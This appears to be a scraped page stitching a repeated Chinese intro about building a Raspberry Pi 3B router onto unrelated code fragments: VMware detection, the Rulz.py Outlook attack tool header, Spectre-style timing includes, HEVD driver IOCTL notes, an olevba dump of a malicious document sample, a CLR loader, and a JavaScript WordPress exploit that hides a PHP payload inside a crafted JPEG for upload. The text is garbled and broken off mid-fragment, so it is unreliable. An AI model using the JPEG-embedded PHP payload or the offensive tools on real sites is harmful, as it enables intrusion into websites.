新款的树莓派3B功能之丰富，性能之强悍，让我垂涎。考虑到家里的网件 WNDR3700v2 也服役四年有余了。还是败了一个树莓派3B回来打造成新的路由。
WARNING
本文所有指令均仅供参考，切勿无脑复制粘贴！
〇 安装系统
/* | |
Detect VMWare using OEM String in Memory | |
Tested on Windows XP SP3/VMWare Workstation 7.1.0 | |
c0d3inj3cT | |
*/ | |
#include <windows.h> | |
#include <stdio.h> | |
#define MARKER "MS_VM_CERT" |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
// Base code taken from | |
// https://github.com/mfontanini/Programs-Scripts/blob/master/constexpr_hashes/md5.h | |
// and expanded to include a main function | |
#ifndef CONSTEXPR_HASH_MD5_H | |
#define CONSTEXPR_HASH_MD5_H | |
#include <array> | |
#include <iostream> | |
#include <cstdint> |
新款的树莓派3B功能之丰富，性能之强悍，让我垂涎。考虑到家里的网件 WNDR3700v2 也服役四年有余了。还是败了一个树莓派3B回来打造成新的路由。
WARNING
本文所有指令均仅供参考，切勿无脑复制粘贴！
〇 安装系统
# http://www.bouncycastle.org/csharp/
# Placeholder path to the BouncyCastle.Crypto.dll assembly; replace it with the
# real location before running.
$BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll'
# Add-Type -Path loads the assembly from disk into this PowerShell session and
# -PassThru returns the types it defines. NOTE(review): whatever file sits at
# this path runs with the session's privileges, so confirm the DLL's origin
# (publisher signature or a known-good hash) before loading it.
$BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru
function Get-TrustedRootCertificateHash { | |
[OutputType([String])] | |
[CmdletBinding()] | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
TL;DR: Using symbolic execution to recover driver IOCTL codes that are computed at runtime.
The goal here is to find valid IOCTL codes for the HackSysExtremeVulnerableDriver by analyzing the binary. The control flow differs between the binary and the source due to compiler optimizations. As a result, only a few IOCTL codes in the assembly are represented as constants, with the remaining ones computed at runtime.
The code in hevd_ioctl.py is an approximation of the control flow of the compiled IrpDeviceIoCtlHandler
function. The effects of the compiler optimization are more pronounced when comparing this code to the original C function. To comply with requirements of the PyExZ3 module, the target function is named after the script's filename, and the `ex
## uploaded by @JohnLaTwC | |
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
=============================================================================== | |
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
Type: OLE | |
------------------------------------------------------------------------------- |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |